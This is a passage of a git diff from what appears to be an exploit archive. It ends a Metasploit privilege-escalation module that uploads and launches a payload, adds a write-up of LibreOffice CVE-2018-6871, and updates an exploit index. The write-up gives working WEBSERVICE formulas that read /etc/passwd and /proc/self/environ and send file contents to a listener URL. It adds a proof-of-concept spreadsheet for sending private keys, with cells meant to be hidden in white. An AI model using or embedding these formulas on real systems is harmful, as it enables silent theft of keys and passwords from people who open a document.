Upload payload + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + # The echo at the end of the command is required + # else the original session may die + output = cmd_exec "#{exp_path}& echo " + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/remote/44022.md b/exploits/linux/remote/44022.md new file mode 100644 index 000000000..8e81957f0 --- /dev/null +++ b/exploits/linux/remote/44022.md @@ -0,0 +1,396 @@ +# Vulnerability description + +[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871) + +## First part + +LibreOffice supports COM.MICROSOFT.WEBSERVICE function: + + https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 + +The function is required to obtain data by URL, usually used as: + + =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)") + +In original: + + For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value. + +In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1. + +## Second part + +By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document. + +# Exploitation + +To read file you need just: + + =WEBSERVICE("/etc/passwd") + +This function can also be used to send a file: + + =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd")) + +For successful operation, you need to send the files of the current user, so you need to retrieve current user home path. + + =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=", + +Also you can parse other files too, like a ~/.ssh/config or something like that. + +For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works). + +# Impact + +It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO. + +# Acknowledgment + +Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes). + + - - - + +# poc.fods + +``` + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Proof-of-concept: send private keys (this cells of course must be moved and set color to white) + + + + + + + + + + Current user: + + + #VALUE! + + + 689 + + + 676 + + + #VALUE! + + + (change this)Address: + + + http://localhost:8080 + + + + + + List of private keys: + + + + + #VALUE! + + + + Send: + + + + + + + 0 (default path) + + + + + + + #VALUE! + + + + + + 1 + + + + + + 132 + + + 109 + + + 96 + + + + #VALUE! + + + + + + 2 + + + + + + 297 + + + 259 + + + 246 + + + + #VALUE! + + + + + + 3 + + + + + + 436 + + + 409 + + + 396 + + + + #VALUE! + + + + + + 4 + + + + + + 586 + + + 563 + + + 550 + + + + #VALUE! + + + + + + 5 + + + + + + 718 + + + 695 + + + 682 + + + + #VALUE! + + + + + + 6 + + + + + + 882 + + + 860 + + + 847 + + + + #VALUE! + + + + + + 7 + + + + + + 1267 + + + 1240 + + + 1227 + + + + #VALUE! + + + + + + 8 + + + + + + 1408 + + + 1383 + + + 1370 + + + + #VALUE! + + + + + + 9 + + + + + + #VALUE! + + + #VALUE! + + + #VALUE! + + + + #VALUE! + + + + + + + +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ab2480fdb..4bc031f83 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port 43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux, 43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows, 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple, +44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, +44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, +44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, @@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware, 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple, 44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple, +44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 @@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php, 44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php, 44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php, +44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java, +44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java, +44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80